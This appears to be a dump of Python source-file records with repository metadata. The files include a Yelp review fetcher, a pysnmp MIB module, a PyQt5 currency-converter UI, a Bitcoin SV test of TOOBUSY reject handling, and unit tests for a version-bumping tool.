>>> datatoexcel = pd.ExcelWriter("CaracteristicasImagen.xlsx",engine='xlsxwriter')
>>> data.to_excel(datatoexcel, sheet_name='Sheet1')
>>> datatoexcel.save()
| 0 | 0 | 0 |
86b2124c42fbfbb4dcc93fef5c42abfa9a7f60e0 | 612 | py | Python | Github, Yelp, YouTube/yelp_get_business.py | nraythz/Data-Mining | ed5a61e01a68aae5e8c8b86d405613ccfb6a01b6 | [
"MIT"
] | null | null | null | Github, Yelp, YouTube/yelp_get_business.py | nraythz/Data-Mining | ed5a61e01a68aae5e8c8b86d405613ccfb6a01b6 | [
"MIT"
] | null | null | null | Github, Yelp, YouTube/yelp_get_business.py | nraythz/Data-Mining | ed5a61e01a68aae5e8c8b86d405613ccfb6a01b6 | [
"MIT"
] | null | null | null | from yelp_client import get_yelp_client
if __name__ == '__main__':
client = get_yelp_client()
parser = get_parser()
args = parser.parse_args()
params = {
'lang': args.language
}
response = client.get_business(args.id, **params)
business = response.business
print("Review count: {}".format(business.review_count))
for review in business.reviews:
print("{} (by {})".format(review.excerpt, review.user.name)) | 26.608696 | 68 | 0.658497 | from yelp_client import get_yelp_client
def get_parser():
parser = ArgumentParser()
parser.add_argument('--id')
parser.add_argument('--language', default='en')
return parser
if __name__ == '__main__':
client = get_yelp_client()
parser = get_parser()
args = parser.parse_args()
params = {
'lang': args.language
}
response = client.get_business(args.id, **params)
business = response.business
print("Review count: {}".format(business.review_count))
for review in business.reviews:
print("{} (by {})".format(review.excerpt, review.user.name)) | 128 | 0 | 23 |
95abe76fd0e0ba6ce75062af453000dc541c9f26 | 3,189 | py | Python | pysnmp-with-texts/ATTO-PRODUCTS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/ATTO-PRODUCTS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/ATTO-PRODUCTS-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module ATTO-PRODUCTS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ATTO-PRODUCTS-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:31:53 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibIdentifier, TimeTicks, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, IpAddress, NotificationType, ObjectIdentity, Bits, Counter64, ModuleIdentity, Integer32, iso, enterprises, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "TimeTicks", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "IpAddress", "NotificationType", "ObjectIdentity", "Bits", "Counter64", "ModuleIdentity", "Integer32", "iso", "enterprises", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
attoProductsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 4547, 3, 2))
attoProductsMIB.setRevisions(('2013-04-19 13:45',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: attoProductsMIB.setRevisionsDescriptions(('Initial version of this module.',))
if mibBuilder.loadTexts: attoProductsMIB.setLastUpdated('201304191345Z')
if mibBuilder.loadTexts: attoProductsMIB.setOrganization('ATTO Technology, Inc.')
if mibBuilder.loadTexts: attoProductsMIB.setContactInfo('ATTO Technology 155 Crosspoint Parkway Amherst NY 14068 EMail: <support@attotech.com>')
if mibBuilder.loadTexts: attoProductsMIB.setDescription('This modules defines object identifiers assigned to various hardware platforms, which are returned as values for sysObjectID.')
attotech = MibIdentifier((1, 3, 6, 1, 4, 1, 4547))
attoProducts = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1))
attoMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 2))
attoModules = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 3))
attoAgentCapability = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 4))
attoGenericDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 1))
attoHba = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 3))
attoFB6500 = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 4))
attoFB6500N = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 5))
mibBuilder.exportSymbols("ATTO-PRODUCTS-MIB", attoFB6500=attoFB6500, attoModules=attoModules, attotech=attotech, attoMgmt=attoMgmt, attoProductsMIB=attoProductsMIB, attoFB6500N=attoFB6500N, attoHba=attoHba, attoGenericDevice=attoGenericDevice, attoProducts=attoProducts, attoAgentCapability=attoAgentCapability, PYSNMP_MODULE_ID=attoProductsMIB)
| 96.636364 | 505 | 0.770147 | #
# PySNMP MIB module ATTO-PRODUCTS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ATTO-PRODUCTS-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:31:53 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibIdentifier, TimeTicks, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, IpAddress, NotificationType, ObjectIdentity, Bits, Counter64, ModuleIdentity, Integer32, iso, enterprises, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "TimeTicks", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "IpAddress", "NotificationType", "ObjectIdentity", "Bits", "Counter64", "ModuleIdentity", "Integer32", "iso", "enterprises", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
attoProductsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 4547, 3, 2))
attoProductsMIB.setRevisions(('2013-04-19 13:45',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: attoProductsMIB.setRevisionsDescriptions(('Initial version of this module.',))
if mibBuilder.loadTexts: attoProductsMIB.setLastUpdated('201304191345Z')
if mibBuilder.loadTexts: attoProductsMIB.setOrganization('ATTO Technology, Inc.')
if mibBuilder.loadTexts: attoProductsMIB.setContactInfo('ATTO Technology 155 Crosspoint Parkway Amherst NY 14068 EMail: <support@attotech.com>')
if mibBuilder.loadTexts: attoProductsMIB.setDescription('This modules defines object identifiers assigned to various hardware platforms, which are returned as values for sysObjectID.')
attotech = MibIdentifier((1, 3, 6, 1, 4, 1, 4547))
attoProducts = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1))
attoMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 2))
attoModules = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 3))
attoAgentCapability = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 4))
attoGenericDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 1))
attoHba = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 3))
attoFB6500 = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 4))
attoFB6500N = MibIdentifier((1, 3, 6, 1, 4, 1, 4547, 1, 5))
mibBuilder.exportSymbols("ATTO-PRODUCTS-MIB", attoFB6500=attoFB6500, attoModules=attoModules, attotech=attotech, attoMgmt=attoMgmt, attoProductsMIB=attoProductsMIB, attoFB6500N=attoFB6500N, attoHba=attoHba, attoGenericDevice=attoGenericDevice, attoProducts=attoProducts, attoAgentCapability=attoAgentCapability, PYSNMP_MODULE_ID=attoProductsMIB)
| 0 | 0 | 0 |
4cff55d59a297ba96c50675dc06b9a8322c3cd91 | 326 | py | Python | setup.py | jaketeater/simpleusbrelay | bf300f339d2a74f0a041d3dbf5a7d8cc8c81cf46 | [
"MIT"
] | 5 | 2015-05-26T08:18:56.000Z | 2020-02-16T01:34:51.000Z | setup.py | jaketeater/simpleusbrelay | bf300f339d2a74f0a041d3dbf5a7d8cc8c81cf46 | [
"MIT"
] | 5 | 2015-02-22T01:25:51.000Z | 2018-02-17T23:38:32.000Z | setup.py | patrickjahns/simpleusbrelay | 25c8cddbbb25637f652276824d1f38213b275a0b | [
"MIT"
] | 4 | 2016-09-14T14:13:32.000Z | 2021-03-19T00:57:56.000Z | from distutils.core import setup
setup(
name='python-simple-usbrelay',
url='https://github.com/patrickjahns/simpleusbrelay',
version='0.1',
packages=['simpleusbarray'],
author='Patrick Jahns',
author_email='patrick.jahns@gmail.com',
license='MIT',
long_description=open('README.rst').read()
)
| 25.076923 | 57 | 0.687117 | from distutils.core import setup
setup(
name='python-simple-usbrelay',
url='https://github.com/patrickjahns/simpleusbrelay',
version='0.1',
packages=['simpleusbarray'],
author='Patrick Jahns',
author_email='patrick.jahns@gmail.com',
license='MIT',
long_description=open('README.rst').read()
)
| 0 | 0 | 0 |
00642f4514d7506cee5b16f6b6a0b39842e9b1bf | 5,811 | py | Python | View/PY/ui_ConvertCoinUI.py | GeovaniTech/ConversorDeMoedas | 5bcab918b036f84711bd05eb2169c85accb7fb79 | [
"MIT"
] | null | null | null | View/PY/ui_ConvertCoinUI.py | GeovaniTech/ConversorDeMoedas | 5bcab918b036f84711bd05eb2169c85accb7fb79 | [
"MIT"
] | null | null | null | View/PY/ui_ConvertCoinUI.py | GeovaniTech/ConversorDeMoedas | 5bcab918b036f84711bd05eb2169c85accb7fb79 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ConvertCoinUI.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from View.PY import ConQRC
| 51.424779 | 108 | 0.703149 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ConvertCoinUI.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ConversorDeMoeda(object):
def setupUi(self, ConversorDeMoeda):
ConversorDeMoeda.setObjectName("ConversorDeMoeda")
ConversorDeMoeda.resize(821, 532)
ConversorDeMoeda.setMinimumSize(QtCore.QSize(805, 532))
ConversorDeMoeda.setMaximumSize(QtCore.QSize(821, 532))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/Icons and Images/Logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
ConversorDeMoeda.setWindowIcon(icon)
ConversorDeMoeda.setIconSize(QtCore.QSize(50, 50))
self.TelaConv = QtWidgets.QWidget(ConversorDeMoeda)
self.TelaConv.setObjectName("TelaConv")
self.line_valor = QtWidgets.QLineEdit(self.TelaConv)
self.line_valor.setGeometry(QtCore.QRect(90, 310, 271, 51))
self.line_valor.setStyleSheet("background-color: rgba(0, 0 , 0, 0);\n"
"border: 2px solid rgba(0,0,0,0);\n"
"border-bottom-color: #A9ACF9;\n"
"color: rgb(0,0,0);\n"
"padding-bottom: 8px;\n"
"border-radius: 0px;\n"
"font: 10pt \"Montserrat\";")
self.line_valor.setText("")
self.line_valor.setEchoMode(QtWidgets.QLineEdit.Normal)
self.line_valor.setClearButtonEnabled(False)
self.line_valor.setObjectName("line_valor")
self.simbolo_inicial = QtWidgets.QLabel(self.TelaConv)
self.simbolo_inicial.setGeometry(QtCore.QRect(80, 370, 71, 111))
self.simbolo_inicial.setStyleSheet("font: 25 50pt \"Corbel Light\";\n"
"color: #A9ACF9;")
self.simbolo_inicial.setObjectName("simbolo_inicial")
self.lbl_de = QtWidgets.QLabel(self.TelaConv)
self.lbl_de.setGeometry(QtCore.QRect(380, 340, 31, 21))
self.lbl_de.setStyleSheet("font: 25 20pt \"Corbel Light\";\n"
"color: #A9ACF9;")
self.lbl_de.setObjectName("lbl_de")
self.lbl_para = QtWidgets.QLabel(self.TelaConv)
self.lbl_para.setGeometry(QtCore.QRect(550, 340, 61, 21))
self.lbl_para.setStyleSheet("font: 25 20pt \"Corbel Light\";\n"
"color: #A9ACF9;")
self.lbl_para.setObjectName("lbl_para")
self.conv_cambio = QtWidgets.QComboBox(self.TelaConv)
self.conv_cambio.setGeometry(QtCore.QRect(610, 340, 121, 22))
self.conv_cambio.setEditable(False)
self.conv_cambio.setFrame(False)
self.conv_cambio.setObjectName("conv_cambio")
self.conv_inicial = QtWidgets.QComboBox(self.TelaConv)
self.conv_inicial.setGeometry(QtCore.QRect(420, 340, 121, 22))
self.conv_inicial.setEditable(False)
self.conv_inicial.setFrame(False)
self.conv_inicial.setObjectName("conv_inicial")
self.ImagenPorco = QtWidgets.QLabel(self.TelaConv)
self.ImagenPorco.setGeometry(QtCore.QRect(260, 50, 321, 231))
self.ImagenPorco.setText("")
self.ImagenPorco.setPixmap(QtGui.QPixmap(":/Icons and Images/Porco.svg"))
self.ImagenPorco.setScaledContents(True)
self.ImagenPorco.setObjectName("ImagenPorco")
self.lbl_vale = QtWidgets.QLabel(self.TelaConv)
self.lbl_vale.setGeometry(QtCore.QRect(345, 410, 61, 51))
self.lbl_vale.setStyleSheet("font: 25 25pt \"Corbel Light\";\n"
"color: #4DC724;")
self.lbl_vale.setObjectName("lbl_vale")
self.lbl_valor_inicial = QtWidgets.QLabel(self.TelaConv)
self.lbl_valor_inicial.setGeometry(QtCore.QRect(150, 390, 191, 81))
self.lbl_valor_inicial.setStyleSheet("font: 25 35pt \"Corbel Light\";\n"
"color: rgb(162, 162, 162);")
self.lbl_valor_inicial.setObjectName("lbl_valor_inicial")
self.lbl_hoje = QtWidgets.QLabel(self.TelaConv)
self.lbl_hoje.setGeometry(QtCore.QRect(670, 410, 71, 51))
self.lbl_hoje.setStyleSheet("font: 25 25pt \"Corbel Light\";\n"
"color: #4DC724;")
self.lbl_hoje.setObjectName("lbl_hoje")
self.simbolo_cambio = QtWidgets.QLabel(self.TelaConv)
self.simbolo_cambio.setGeometry(QtCore.QRect(410, 370, 71, 111))
self.simbolo_cambio.setStyleSheet("font: 25 50pt \"Corbel Light\";\n"
"color: #A9ACF9;")
self.simbolo_cambio.setObjectName("simbolo_cambio")
self.lbl_valor_cambio = QtWidgets.QLabel(self.TelaConv)
self.lbl_valor_cambio.setGeometry(QtCore.QRect(480, 390, 191, 81))
self.lbl_valor_cambio.setStyleSheet("font: 25 35pt \"Corbel Light\";\n"
"color: rgb(162, 162, 162);")
self.lbl_valor_cambio.setObjectName("lbl_valor_cambio")
ConversorDeMoeda.setCentralWidget(self.TelaConv)
self.retranslateUi(ConversorDeMoeda)
QtCore.QMetaObject.connectSlotsByName(ConversorDeMoeda)
def retranslateUi(self, ConversorDeMoeda):
_translate = QtCore.QCoreApplication.translate
ConversorDeMoeda.setWindowTitle(_translate("ConversorDeMoeda", "Convert Coin - Conversor de Moeda"))
self.line_valor.setPlaceholderText(_translate("ConversorDeMoeda", "Valor"))
self.simbolo_inicial.setText(_translate("ConversorDeMoeda", "R$"))
self.lbl_de.setText(_translate("ConversorDeMoeda", "De"))
self.lbl_para.setText(_translate("ConversorDeMoeda", "Para"))
self.lbl_vale.setText(_translate("ConversorDeMoeda", "Vale"))
self.lbl_valor_inicial.setText(_translate("ConversorDeMoeda", "0,000000"))
self.lbl_hoje.setText(_translate("ConversorDeMoeda", "Hoje"))
self.simbolo_cambio.setText(_translate("ConversorDeMoeda", "R$"))
self.lbl_valor_cambio.setText(_translate("ConversorDeMoeda", "0,000000"))
from View.PY import ConQRC
| 5,355 | 13 | 76 |
0ab4866064011fcd766538dbf133d0c60bbbe2df | 3,644 | py | Python | test/functional/bsv-toobusyrejectmessage.py | bxlkm1/yulecoin | 3605faf2ff2e3c7bd381414613fc5c0234ad2936 | [
"OML"
] | 8 | 2019-08-02T02:49:42.000Z | 2022-01-17T15:51:48.000Z | test/functional/bsv-toobusyrejectmessage.py | bxlkm1/yulecoin | 3605faf2ff2e3c7bd381414613fc5c0234ad2936 | [
"OML"
] | null | null | null | test/functional/bsv-toobusyrejectmessage.py | bxlkm1/yulecoin | 3605faf2ff2e3c7bd381414613fc5c0234ad2936 | [
"OML"
] | 4 | 2019-08-02T02:50:44.000Z | 2021-05-28T03:21:38.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin SV developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import p2p_port, disconnect_nodes
from test_framework.blocktools import create_block, create_coinbase, assert_equal
import datetime
# This test checks TOOBUSY reject message and behaviour that it triggers.
# Scenario 1:
# 2 nodes (A and B) send HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A then sends REJECT_TOOBUSY message. After that, node B should be asked for the same block (GetData).
# Scenario 2:
# Node A sends HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A sends REJECT_TOOBUSY message. Bitcoind waits and asks again after 5 seconds.
if __name__ == '__main__':
TooBusyRejectMsgTest().main() | 38.765957 | 141 | 0.652305 | #!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin SV developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import p2p_port, disconnect_nodes
from test_framework.blocktools import create_block, create_coinbase, assert_equal
import datetime
# This test checks TOOBUSY reject message and behaviour that it triggers.
# Scenario 1:
# 2 nodes (A and B) send HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A then sends REJECT_TOOBUSY message. After that, node B should be asked for the same block (GetData).
# Scenario 2:
# Node A sends HEADERS message to bitcoind. Bitcoind sends GetData to node A.
# Node A sends REJECT_TOOBUSY message. Bitcoind waits and asks again after 5 seconds.
class TooBusyRejectMsgTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.num_peers = 2
self.REJECT_TOOBUSY = int('0x44', 16)
def prepareBlock(self):
height = 1
tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
block_time = int(time.time()) + 1
block = create_block(tip, create_coinbase(height), block_time)
block.solve()
return block
def run_test(self):
self.stop_node(0)
askedFor = {}
rejectSent = False
def on_getdata(conn, message):
if (conn in askedFor):
askedFor[conn] += 1
else:
askedFor[conn] = 1
nonlocal rejectSent
# First node that receives GetData should send reject.
if not rejectSent:
rejectSent = True
conn.send_message(msg_reject(message=b"getdata", code=self.REJECT_TOOBUSY, reason=b"node too busy"))
with self.run_node_with_connections("Scenario 1: sending TOOBUSY reject message with 2 nodes", 0, [], self.num_peers) as connections:
block = self.prepareBlock()
for connection in connections:
connection.cb.on_getdata = on_getdata
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(block)]
connection.cb.send_message(headers_message)
connection.cb.wait_for_getdata(block.sha256)
connection.cb.sync_with_ping()
for key, value in askedFor.items():
assert_equal(value, 1)
assert_equal(len(askedFor), 2)
self.num_peers = 1
askedFor = {}
rejectSent = False
with self.run_node_with_connections("Scenario 2: sending TOOBUSY reject message with 1 node", 0, [], self.num_peers) as connections:
block = self.prepareBlock()
connection = connections[0]
connection.cb.on_getdata = on_getdata
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(block)]
begin_test = datetime.datetime.now()
connection.cb.send_message(headers_message)
connection.cb.wait_for_getdata(block.sha256)
connection.cb.last_message["getdata"] = []
connection.cb.wait_for_getdata(block.sha256)
end_test = datetime.datetime.now()
assert(end_test - begin_test > datetime.timedelta(seconds = 5))
assert_equal(next(iter(askedFor.values())), 2)
assert_equal(len(askedFor), 1)
if __name__ == '__main__':
TooBusyRejectMsgTest().main() | 2,513 | 28 | 103 |
d6ba8bf6f755c2003be639a8935050214e58c73b | 231 | py | Python | src/patched_flannel/classification/classification_inference.py | mannbiher/DeepLearningForHealthCareProject | 4692031591bd88c489c9b905e7c340ac76a5366b | [
"MIT"
] | null | null | null | src/patched_flannel/classification/classification_inference.py | mannbiher/DeepLearningForHealthCareProject | 4692031591bd88c489c9b905e7c340ac76a5366b | [
"MIT"
] | 14 | 2021-05-10T18:00:58.000Z | 2021-05-12T00:29:41.000Z | src/patched_flannel/classification/classification_inference.py | mannbiher/DeepLearningForHealthCareProject | 4692031591bd88c489c9b905e7c340ac76a5366b | [
"MIT"
] | null | null | null | import inference
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("cv", help = "Cross Validation")
args = parser.parse_args()
cv = args.cv
inference.main(cv)
| 23.1 | 57 | 0.679654 | import inference
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("cv", help = "Cross Validation")
args = parser.parse_args()
cv = args.cv
inference.main(cv)
| 0 | 0 | 0 |
28ba03932133ca7783d3e79b01364e01f4e4daff | 8,272 | py | Python | pybump/pybump_unittest.py | nvanheuverzwijn/PyBump | 08151e86c0b3b9cffcac6b324efd3a8772a34358 | [
"Apache-2.0"
] | null | null | null | pybump/pybump_unittest.py | nvanheuverzwijn/PyBump | 08151e86c0b3b9cffcac6b324efd3a8772a34358 | [
"Apache-2.0"
] | null | null | null | pybump/pybump_unittest.py | nvanheuverzwijn/PyBump | 08151e86c0b3b9cffcac6b324efd3a8772a34358 | [
"Apache-2.0"
] | null | null | null | import unittest
from subprocess import run, PIPE
from pybump.pybump import *
valid_helm_chart = {'apiVersion': 'v1',
'appVersion': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
invalid_helm_chart = {'apiVersion': 'v1',
'notAppVersionKeyHere': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
empty_helm_chart = {}
valid_setup_py = """
setuptools.setup(
name="pybump",
version="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ArieLevs/PyBump",
license='Apache License 2.0',
packages=setuptools.find_packages(),
)
"""
# This setup.py content is missing 'version' key
invalid_setup_py_1 = """
setuptools.setup(
name="pybump",
invalid_version_string="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
# This setup.py content 'version' key declared 3 times
invalid_setup_py_2 = """
setuptools.setup(
name="pybump",
version="0.1.3",
version="0.1.2",
__version__="12356"
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
valid_version_file_1 = """0.12.4"""
valid_version_file_2 = """
1.5.0
"""
invalid_version_file_1 = """
this is some text in addition to version
1.5.0
nothing except semantic version should be in this file
"""
invalid_version_file_2 = """
version=1.5.0
"""
if __name__ == '__main__':
unittest.main()
| 38.835681 | 99 | 0.5978 | import unittest
from subprocess import run, PIPE
from pybump.pybump import *
valid_helm_chart = {'apiVersion': 'v1',
'appVersion': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
invalid_helm_chart = {'apiVersion': 'v1',
'notAppVersionKeyHere': '1.0',
'description': 'A Helm chart for Kubernetes',
'name': 'test',
'version': '0.1.0'}
empty_helm_chart = {}
valid_setup_py = """
setuptools.setup(
name="pybump",
version="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ArieLevs/PyBump",
license='Apache License 2.0',
packages=setuptools.find_packages(),
)
"""
# This setup.py content is missing 'version' key
invalid_setup_py_1 = """
setuptools.setup(
name="pybump",
invalid_version_string="0.1.3",
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
# This setup.py content 'version' key declared 3 times
invalid_setup_py_2 = """
setuptools.setup(
name="pybump",
version="0.1.3",
version="0.1.2",
__version__="12356"
author="Arie Lev",
author_email="levinsonarie@gmail.com",
description="Python version bumper",
)
"""
valid_version_file_1 = """0.12.4"""
valid_version_file_2 = """
1.5.0
"""
invalid_version_file_1 = """
this is some text in addition to version
1.5.0
nothing except semantic version should be in this file
"""
invalid_version_file_2 = """
version=1.5.0
"""
def get_version(file):
return run(["python", "pybump/pybump.py", "get", "--file", file],
stdout=PIPE, stderr=PIPE)
def set_version(file, version):
return run(["python", "pybump/pybump.py", "set", "--file", file, "--set-version", version],
stdout=PIPE, stderr=PIPE)
class PyBumpTest(unittest.TestCase):
def setUp(self):
pass
def test_is_semantic_string(self):
self.assertEqual(is_semantic_string('1.2.3'), [1, 2, 3])
self.assertNotEqual(is_semantic_string('1.2.3'), [1, 2, 4])
self.assertTrue(is_semantic_string('0.0.0'))
self.assertTrue(is_semantic_string('13.0.75'))
self.assertTrue(is_semantic_string('0.5.447'))
self.assertTrue(is_semantic_string('1.02.3'))
self.assertTrue(is_semantic_string('000.000.111'))
self.assertFalse(is_semantic_string('1.2.c'))
self.assertFalse(is_semantic_string('1.2.-3'))
self.assertFalse(is_semantic_string('1.2.3-dev'))
self.assertFalse(is_semantic_string('1.9'))
self.assertFalse(is_semantic_string('text'))
self.assertFalse(is_semantic_string(4))
self.assertFalse(is_semantic_string(True))
self.assertFalse(is_semantic_string(None))
def test_is_valid_helm_chart(self):
self.assertTrue(is_valid_helm_chart(valid_helm_chart))
self.assertFalse(is_valid_helm_chart(invalid_helm_chart))
self.assertFalse(is_valid_helm_chart(empty_helm_chart))
def test_bump_version(self):
self.assertEqual(bump_version([9, 0, 7], 'major'), [10, 0, 0])
self.assertEqual(bump_version([1, 2, 3], 'major'), [2, 0, 0])
self.assertEqual(bump_version([1, 2, 3], 'minor'), [1, 3, 0])
self.assertEqual(bump_version([1, 2, 3], 'patch'), [1, 2, 4])
self.assertEqual(bump_version([0, 0, 9], 'patch'), [0, 0, 10])
self.assertRaises(ValueError, bump_version, None, 'patch')
self.assertRaises(ValueError, bump_version, [1, 2, 3], 'not_patch')
def test_get_setup_py_version(self):
self.assertEqual(get_setup_py_version(valid_setup_py), '0.1.3')
with self.assertRaises(RuntimeError):
get_setup_py_version(invalid_setup_py_1)
with self.assertRaises(RuntimeError):
get_setup_py_version(invalid_setup_py_2)
def test_is_valid_version_file(self):
self.assertTrue(is_semantic_string(valid_version_file_1))
self.assertTrue(is_semantic_string(valid_version_file_2))
self.assertFalse(is_semantic_string(invalid_version_file_1))
self.assertFalse(is_semantic_string(invalid_version_file_2))
self.assertEqual(is_semantic_string(valid_version_file_1), [0, 12, 4])
@staticmethod
def test_bump_patch():
set_version("pybump/test_valid_chart.yaml", "0.1.0")
completed_process_object = run(["python", "pybump/pybump.py", "bump",
"--level", "patch",
"--file", "pybump/test_valid_chart.yaml"],
stdout=PIPE,
stderr=PIPE)
if completed_process_object.returncode != 0:
raise Exception(completed_process_object.stderr.decode('utf-8'))
completed_process_object = get_version("pybump/test_valid_chart.yaml")
if completed_process_object.returncode != 0:
raise Exception(completed_process_object.stderr.decode('utf-8'))
stdout = completed_process_object.stdout.decode('utf-8').strip()
if stdout != "0.1.1":
raise Exception("test_bump_patch failed, return version should be 0.1.1 got " + stdout)
@staticmethod
def test_bump_minor():
set_version("pybump/test_valid_setup.py", "2.1.5")
completed_process_object = run(["python", "pybump/pybump.py", "bump",
"--level", "minor",
"--file", "pybump/test_valid_setup.py"],
stdout=PIPE,
stderr=PIPE)
if completed_process_object.returncode != 0:
raise Exception(completed_process_object.stderr.decode('utf-8'))
completed_process_object = get_version("pybump/test_valid_setup.py")
if completed_process_object.returncode != 0:
raise Exception(completed_process_object.stderr.decode('utf-8'))
stdout = completed_process_object.stdout.decode('utf-8').strip()
if stdout != "2.2.0":
raise Exception("test_bump_minor failed, return version should be 2.2.0 got " + stdout)
@staticmethod
def test_bump_major():
set_version("pybump/test_valid_chart.yaml", "0.5.9")
completed_process_object = run(["python", "pybump/pybump.py", "bump",
"--level", "major",
"--file", "pybump/test_valid_chart.yaml"],
stdout=PIPE,
